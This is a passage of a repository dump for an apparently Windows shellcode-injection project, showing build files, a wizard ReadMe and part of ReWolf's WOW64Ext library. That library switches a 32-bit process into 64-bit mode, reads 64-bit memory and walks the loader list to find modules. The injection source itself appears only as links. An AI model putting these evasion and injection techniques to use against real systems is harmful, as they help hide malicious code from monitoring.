10 |
11 |
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/DLLtest.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/DLLtest.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/DLLtest.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/DLLtest.pch
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/dllmain.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/dllmain.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/mt.dep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/mt.dep
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/stdafx.obj
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/vc90.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/vc90.idb
--------------------------------------------------------------------------------
/UnModuelInject/DLLtest/x64/Release/vc90.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/DLLtest/x64/Release/vc90.pdb
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject.ncb
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "UnModuelInject", "UnModuelInject\UnModuelInject.vcproj", "{F456649B-3A95-4E96-B701-037F80B06BA1}"
5 | EndProject
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLLtest", "DLLtest\DLLtest.vcproj", "{B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Win32 = Debug|Win32
11 | Debug|x64 = Debug|x64
12 | Release|Win32 = Release|Win32
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Debug|Win32.ActiveCfg = Debug|Win32
17 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Debug|Win32.Build.0 = Debug|Win32
18 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Debug|x64.ActiveCfg = Debug|x64
19 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Debug|x64.Build.0 = Debug|x64
20 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Release|Win32.ActiveCfg = Release|Win32
21 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Release|Win32.Build.0 = Release|Win32
22 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Release|x64.ActiveCfg = Release|x64
23 | {F456649B-3A95-4E96-B701-037F80B06BA1}.Release|x64.Build.0 = Release|x64
24 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Debug|Win32.ActiveCfg = Debug|Win32
25 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Debug|Win32.Build.0 = Debug|Win32
26 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Debug|x64.ActiveCfg = Debug|x64
27 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Debug|x64.Build.0 = Debug|x64
28 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Release|Win32.ActiveCfg = Release|Win32
29 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Release|Win32.Build.0 = Release|Win32
30 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Release|x64.ActiveCfg = Release|x64
31 | {B36BAF2B-4B9D-4B55-972F-39E6AD837CF6}.Release|x64.Build.0 = Release|x64
32 | EndGlobalSection
33 | GlobalSection(SolutionProperties) = preSolution
34 | HideSolutionNode = FALSE
35 | EndGlobalSection
36 | EndGlobal
37 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject.suo
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/BuildLog.htm
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/UnModuelInject.exe.embed.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/UnModuelInject.exe.embed.manifest.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/UnModuelInject.exe.embed.manifest.res
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/UnModuelInject.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/UnModuelInject.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/UnModuelInject.pch
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/UnModuleInject.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/UnModuleInject.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/Unmodule_Inject.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/Unmodule_Inject.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/mt.dep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/mt.dep
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/stdafx.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/vc90.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/vc90.idb
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/vc90.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/vc90.pdb
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/wow64ext.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/wow64ext.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Debug/x32ext.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Debug/x32ext.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | 控制台应用程序:UnModuelInject 项目概述
3 | ========================================================================
4 |
5 | 应用程序向导已为您创建了此 UnModuelInject 应用程序。
6 |
7 | 本文件概要介绍组成 UnModuelInject 应用程序的
8 | 的每个文件的内容。
9 |
10 |
11 | UnModuelInject.vcproj
12 | 这是使用应用程序向导生成的 VC++ 项目的主项目文件,
13 | 其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
14 |
15 | UnModuelInject.cpp
16 | 这是主应用程序源文件。
17 |
18 | /////////////////////////////////////////////////////////////////////////////
19 | 其他标准文件:
20 |
21 | StdAfx.h, StdAfx.cpp
22 | 这些文件用于生成名为 UnModuelInject.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
23 |
24 | /////////////////////////////////////////////////////////////////////////////
25 | 其他注释:
26 |
27 | 应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
28 |
29 | /////////////////////////////////////////////////////////////////////////////
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/BuildLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/BuildLog.htm
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/UnModuelInject.exe.intermediate.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/UnModuelInject.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/UnModuelInject.pch
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/UnModuleInject.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/UnModuleInject.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/Unmodule_Inject.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/Unmodule_Inject.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/mt.dep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/mt.dep
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/stdafx.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/vc90.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/vc90.idb
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/vc90.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/vc90.pdb
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/wow64ext.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/wow64ext.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Release/x32ext.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Release/x32ext.obj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/UnModuelInject.vcproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/UnModuelInject.vcproj
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/UnModuelInject.vcproj.DESKTOP-AS29ISP.YYYYY.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/UnModuelInject.vcproj.storm-PC.storm.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/UnModuleInject.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/UnModuleInject.cpp
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/UnModuleInject.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/UnModuleInject.h
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/Unmodule_Inject.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/Unmodule_Inject.cpp
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/stdafx.cpp
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/stdafx.h
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/UnModuelInject/UnModuelInject/targetver.h
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/wow64ext/internal.h:
--------------------------------------------------------------------------------
1 | /**
2 | *
3 | * WOW64Ext Library
4 | *
5 | * Copyright (c) 2014 ReWolf
6 | * http://blog.rewolf.pl/
7 | *
8 | * This program is free software: you can redistribute it and/or modify
9 | * it under the terms of the GNU Lesser General Public License as published
10 | * by the Free Software Foundation, either version 3 of the License, or
11 | * (at your option) any later version.
12 | *
13 | * This program is distributed in the hope that it will be useful,
14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | * GNU Lesser General Public License for more details.
17 | *
18 | * You should have received a copy of the GNU Lesser General Public License
19 | * along with this program. If not, see .
20 | *
21 | */
22 | #pragma once
23 |
24 | #ifndef _WIN64
25 | #define EMIT(a) __asm __emit (a)
26 |
27 | #define X64_Start_with_CS(_cs) \
28 | { \
29 | EMIT(0x6A) EMIT(_cs) /* push _cs */ \
30 | EMIT(0xE8) EMIT(0) EMIT(0) EMIT(0) EMIT(0) /* call $+5 */ \
31 | EMIT(0x83) EMIT(4) EMIT(0x24) EMIT(5) /* add dword [esp], 5 */ \
32 | EMIT(0xCB) /* retf */ \
33 | }
34 |
35 | #define X64_End_with_CS(_cs) \
36 | { \
37 | EMIT(0xE8) EMIT(0) EMIT(0) EMIT(0) EMIT(0) /* call $+5 */ \
38 | EMIT(0xC7) EMIT(0x44) EMIT(0x24) EMIT(4) EMIT(_cs) EMIT(0) EMIT(0) EMIT(0) /* mov dword [rsp + 4], _cs */ \
39 | EMIT(0x83) EMIT(4) EMIT(0x24) EMIT(0xD) /* add dword [rsp], 0xD */ \
40 | EMIT(0xCB) /* retf */ \
41 | }
42 |
43 | #define X64_Start() X64_Start_with_CS(0x33)
44 | #define X64_End() X64_End_with_CS(0x23)
45 |
46 | #define _RAX 0
47 | #define _RCX 1
48 | #define _RDX 2
49 | #define _RBX 3
50 | #define _RSP 4
51 | #define _RBP 5
52 | #define _RSI 6
53 | #define _RDI 7
54 | #define _R8 8
55 | #define _R9 9
56 | #define _R10 10
57 | #define _R11 11
58 | #define _R12 12
59 | #define _R13 13
60 | #define _R14 14
61 | #define _R15 15
62 |
63 | #define X64_Push(r) EMIT(0x48 | ((r) >> 3)) EMIT(0x50 | ((r) & 7))
64 | #define X64_Pop(r) EMIT(0x48 | ((r) >> 3)) EMIT(0x58 | ((r) & 7))
65 |
66 | #define REX_W EMIT(0x48) __asm
67 |
68 | //to fool M$ inline asm compiler I'm using 2 DWORDs instead of DWORD64
69 | //use of DWORD64 will generate wrong 'pop word ptr[]' and it will break stack
70 | union reg64
71 | {
72 | DWORD64 v;
73 | DWORD dw[2];
74 | };
75 | #endif
76 |
77 |
--------------------------------------------------------------------------------
/UnModuelInject/UnModuelInject/wow64ext/wow64ext.cpp:
--------------------------------------------------------------------------------
1 | /**
2 | *
3 | * WOW64Ext Library
4 | *
5 | * Copyright (c) 2014 ReWolf
6 | * http://blog.rewolf.pl/
7 | *
8 | * This program is free software: you can redistribute it and/or modify
9 | * it under the terms of the GNU Lesser General Public License as published
10 | * by the Free Software Foundation, either version 3 of the License, or
11 | * (at your option) any later version.
12 | *
13 | * This program is distributed in the hope that it will be useful,
14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | * GNU Lesser General Public License for more details.
17 | *
18 | * You should have received a copy of the GNU Lesser General Public License
19 | * along with this program. If not, see .
20 | *
21 | */
22 |
23 | #include
24 |
25 | #ifndef _WIN64
26 | #include
27 | #include
28 | #include "internal.h"
29 | #include "wow64ext.h"
30 |
31 | #pragma comment(lib, "Shlwapi.lib")
32 |
33 | int _mywcsicmp(const wchar_t *string1, const wchar_t *string2)
34 | {
35 | wchar_t c1;
36 | wchar_t c2;
37 | int i = 0;
38 | do
39 | {
40 | c1 = string1[i];
41 | if (c1 >= 'A' && c1 <= 'Z')
42 | c1 += 0x20;
43 |
44 | c2 = string2[i];
45 | if (c2 >= 'A' && c2 <= 'Z')
46 | c2 += 0x20;
47 |
48 | i++;
49 | } while (c1 && c1 == c2);
50 | return c1 - c2;
51 | }
52 |
53 | #pragma warning(push)
54 | #pragma warning(disable : 4409)
55 | /*extern "C" __declspec(dllexport) */DWORD64 __cdecl X64Call(DWORD64 func, int argC, ...)
56 | {
57 | va_list args;
58 | va_start(args, argC);
59 | reg64 _rcx = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
60 | reg64 _rdx = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
61 | reg64 _r8 = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
62 | reg64 _r9 = { (argC > 0) ? argC--, va_arg(args, DWORD64) : 0 };
63 | reg64 _rax = { 0 };
64 |
65 | reg64 restArgs = { (DWORD64)&va_arg(args, DWORD64) };
66 |
67 | // conversion to QWORD for easier use in inline assembly
68 | reg64 _argC = { (DWORD64)argC };
69 | DWORD back_esp = 0;
70 | WORD back_fs = 0;
71 |
72 | __asm
73 | {
74 | ;// reset FS segment, to properly handle RFG
75 | mov back_fs, fs
76 | mov eax, 0x2B
77 | mov fs, ax
78 |
79 | ;// keep original esp in back_esp variable
80 | mov back_esp, esp
81 |
82 | ;// align esp to 0x10, without aligned stack some syscalls may return errors !
83 | ;// (actually, for syscalls it is sufficient to align to 8, but SSE opcodes
84 | ;// requires 0x10 alignment), it will be further adjusted according to the
85 | ;// number of arguments above 4
86 | and esp, 0xFFFFFFF0
87 |
88 | X64_Start();
89 |
90 | ;// below code is compiled as x86 inline asm, but it is executed as x64 code
91 | ;// that's why it need sometimes REX_W() macro, right column contains detailed
92 | ;// transcription how it will be interpreted by CPU
93 |
94 | ;// fill first four arguments
95 | REX_W mov ecx, _rcx.dw[0] ;// mov rcx, qword ptr [_rcx]
96 | REX_W mov edx, _rdx.dw[0] ;// mov rdx, qword ptr [_rdx]
97 | push _r8.v ;// push qword ptr [_r8]
98 | X64_Pop(_R8); ;// pop r8
99 | push _r9.v ;// push qword ptr [_r9]
100 | X64_Pop(_R9); ;// pop r9
101 | ;//
102 | REX_W mov eax, _argC.dw[0] ;// mov rax, qword ptr [_argC]
103 | ;//
104 | ;// final stack adjustment, according to the ;//
105 | ;// number of arguments above 4 ;//
106 | test al, 1 ;// test al, 1
107 | jnz _no_adjust ;// jnz _no_adjust
108 | sub esp, 8 ;// sub rsp, 8
109 | _no_adjust: ;//
110 | ;//
111 | push edi ;// push rdi
112 | REX_W mov edi, restArgs.dw[0] ;// mov rdi, qword ptr [restArgs]
113 | ;//
114 | ;// put rest of arguments on the stack ;//
115 | REX_W test eax, eax ;// test rax, rax
116 | jz _ls_e ;// je _ls_e
117 | REX_W lea edi, dword ptr [edi + 8*eax - 8] ;// lea rdi, [rdi + rax*8 - 8]
118 | ;//
119 | _ls: ;//
120 | REX_W test eax, eax ;// test rax, rax
121 | jz _ls_e ;// je _ls_e
122 | push dword ptr [edi] ;// push qword ptr [rdi]
123 | REX_W sub edi, 8 ;// sub rdi, 8
124 | REX_W sub eax, 1 ;// sub rax, 1
125 | jmp _ls ;// jmp _ls
126 | _ls_e: ;//
127 | ;//
128 | ;// create stack space for spilling registers ;//
129 | REX_W sub esp, 0x20 ;// sub rsp, 20h
130 | ;//
131 | call func ;// call qword ptr [func]
132 | ;//
133 | ;// cleanup stack ;//
134 | REX_W mov ecx, _argC.dw[0] ;// mov rcx, qword ptr [_argC]
135 | REX_W lea esp, dword ptr [esp + 8*ecx + 0x20] ;// lea rsp, [rsp + rcx*8 + 20h]
136 | ;//
137 | pop edi ;// pop rdi
138 | ;//
139 | // set return value ;//
140 | REX_W mov _rax.dw[0], eax ;// mov qword ptr [_rax], rax
141 |
142 | X64_End();
143 |
144 | mov ax, ds
145 | mov ss, ax
146 | mov esp, back_esp
147 |
148 | ;// restore FS segment
149 | mov ax, back_fs
150 | mov fs, ax
151 | }
152 | return _rax.v;
153 | }
154 | #pragma warning(pop)
155 |
156 | void getMem64(void* dstMem, DWORD64 srcMem, size_t sz)
157 | {
158 | if ((nullptr == dstMem) || (0 == srcMem) || (0 == sz))
159 | return;
160 |
161 | reg64 _src = { srcMem };
162 |
163 | __asm
164 | {
165 | X64_Start();
166 |
167 | ;// below code is compiled as x86 inline asm, but it is executed as x64 code
168 | ;// that's why it need sometimes REX_W() macro, right column contains detailed
169 | ;// transcription how it will be interpreted by CPU
170 |
171 | push edi ;// push rdi
172 | push esi ;// push rsi
173 | ;//
174 | mov edi, dstMem ;// mov edi, dword ptr [dstMem] ; high part of RDI is zeroed
175 | REX_W mov esi, _src.dw[0] ;// mov rsi, qword ptr [_src]
176 | mov ecx, sz ;// mov ecx, dword ptr [sz] ; high part of RCX is zeroed
177 | ;//
178 | mov eax, ecx ;// mov eax, ecx
179 | and eax, 3 ;// and eax, 3
180 | shr ecx, 2 ;// shr ecx, 2
181 | ;//
182 | rep movsd ;// rep movs dword ptr [rdi], dword ptr [rsi]
183 | ;//
184 | test eax, eax ;// test eax, eax
185 | je _move_0 ;// je _move_0
186 | cmp eax, 1 ;// cmp eax, 1
187 | je _move_1 ;// je _move_1
188 | ;//
189 | movsw ;// movs word ptr [rdi], word ptr [rsi]
190 | cmp eax, 2 ;// cmp eax, 2
191 | je _move_0 ;// je _move_0
192 | ;//
193 | _move_1: ;//
194 | movsb ;// movs byte ptr [rdi], byte ptr [rsi]
195 | ;//
196 | _move_0: ;//
197 | pop esi ;// pop rsi
198 | pop edi ;// pop rdi
199 |
200 | X64_End();
201 | }
202 | }
203 |
204 | bool cmpMem64(void* dstMem, DWORD64 srcMem, size_t sz)
205 | {
206 | if ((nullptr == dstMem) || (0 == srcMem) || (0 == sz))
207 | return false;
208 |
209 | bool result = false;
210 | reg64 _src = { srcMem };
211 | __asm
212 | {
213 | X64_Start();
214 |
215 | ;// below code is compiled as x86 inline asm, but it is executed as x64 code
216 | ;// that's why it need sometimes REX_W() macro, right column contains detailed
217 | ;// transcription how it will be interpreted by CPU
218 |
219 | push edi ;// push rdi
220 | push esi ;// push rsi
221 | ;//
222 | mov edi, dstMem ;// mov edi, dword ptr [dstMem] ; high part of RDI is zeroed
223 | REX_W mov esi, _src.dw[0] ;// mov rsi, qword ptr [_src]
224 | mov ecx, sz ;// mov ecx, dword ptr [sz] ; high part of RCX is zeroed
225 | ;//
226 | mov eax, ecx ;// mov eax, ecx
227 | and eax, 3 ;// and eax, 3
228 | shr ecx, 2 ;// shr ecx, 2
229 | ;//
230 | repe cmpsd ;// repe cmps dword ptr [rsi], dword ptr [rdi]
231 | jnz _ret_false ;// jnz _ret_false
232 | ;//
233 | test eax, eax ;// test eax, eax
234 | je _move_0 ;// je _move_0
235 | cmp eax, 1 ;// cmp eax, 1
236 | je _move_1 ;// je _move_1
237 | ;//
238 | cmpsw ;// cmps word ptr [rsi], word ptr [rdi]
239 | jnz _ret_false ;// jnz _ret_false
240 | cmp eax, 2 ;// cmp eax, 2
241 | je _move_0 ;// je _move_0
242 | ;//
243 | _move_1: ;//
244 | cmpsb ;// cmps byte ptr [rsi], byte ptr [rdi]
245 | jnz _ret_false ;// jnz _ret_false
246 | ;//
247 | _move_0: ;//
248 | mov result, 1 ;// mov byte ptr [result], 1
249 | ;//
250 | _ret_false: ;//
251 | pop esi ;// pop rsi
252 | pop edi ;// pop rdi
253 |
254 | X64_End();
255 | }
256 |
257 | return result;
258 | }
259 |
260 | DWORD64 getTEB64()
261 | {
262 | reg64 reg;
263 | reg.v = 0;
264 |
265 | X64_Start();
266 | // R12 register should always contain pointer to TEB64 in WoW64 processes
267 | X64_Push(_R12);
268 | // below pop will pop QWORD from stack, as we're in x64 mode now
269 | __asm pop reg.dw[0]
270 | X64_End();
271 |
272 | return reg.v;
273 | }
274 |
275 | /*extern "C" __declspec(dllexport) */DWORD64 __cdecl GetModuleHandle64(wchar_t* lpModuleName)
276 | {
277 | TEB64 teb64;
278 | getMem64(&teb64, getTEB64(), sizeof(TEB64));
279 |
280 | PEB64 peb64;
281 | getMem64(&peb64, teb64.ProcessEnvironmentBlock, sizeof(PEB64));
282 | PEB_LDR_DATA64 ldr;
283 | getMem64(&ldr, peb64.Ldr, sizeof(PEB_LDR_DATA64));
284 |
285 | DWORD64 LastEntry = peb64.Ldr + offsetof(PEB_LDR_DATA64, InLoadOrderModuleList);
286 | LDR_DATA_TABLE_ENTRY64 head;
287 | head.InLoadOrderLinks.Flink = ldr.InLoadOrderModuleList.Flink;
288 |
289 | DWORD64 dwRet64 = 0;
290 | do {
291 | getMem64(&head, head.InLoadOrderLinks.Flink, sizeof(LDR_DATA_TABLE_ENTRY64));
292 |
293 | wchar_t* tempBuf = (wchar_t*)malloc(head.BaseDllName.MaximumLength);
294 | if (nullptr == tempBuf)
295 | return 0;
296 | memset(tempBuf, 0, head.BaseDllName.MaximumLength);
297 | getMem64(tempBuf, head.BaseDllName.Buffer, head.BaseDllName.MaximumLength);
298 |
299 | if (0 == _mywcsicmp(lpModuleName, tempBuf)) {
300 | dwRet64 = head.DllBase;
301 |
302 | free(tempBuf);
303 | tempBuf = nullptr;
304 | break;
305 | }
306 | free(tempBuf);
307 | tempBuf = nullptr;
308 | } while (head.InLoadOrderLinks.Flink != LastEntry);
309 |
310 | return dwRet64;
311 | }
312 |
313 | DWORD64 getNTDLL64()
314 | {
315 | static DWORD64 ntdll64 = 0;
316 | if (0 != ntdll64)
317 | return ntdll64;
318 |
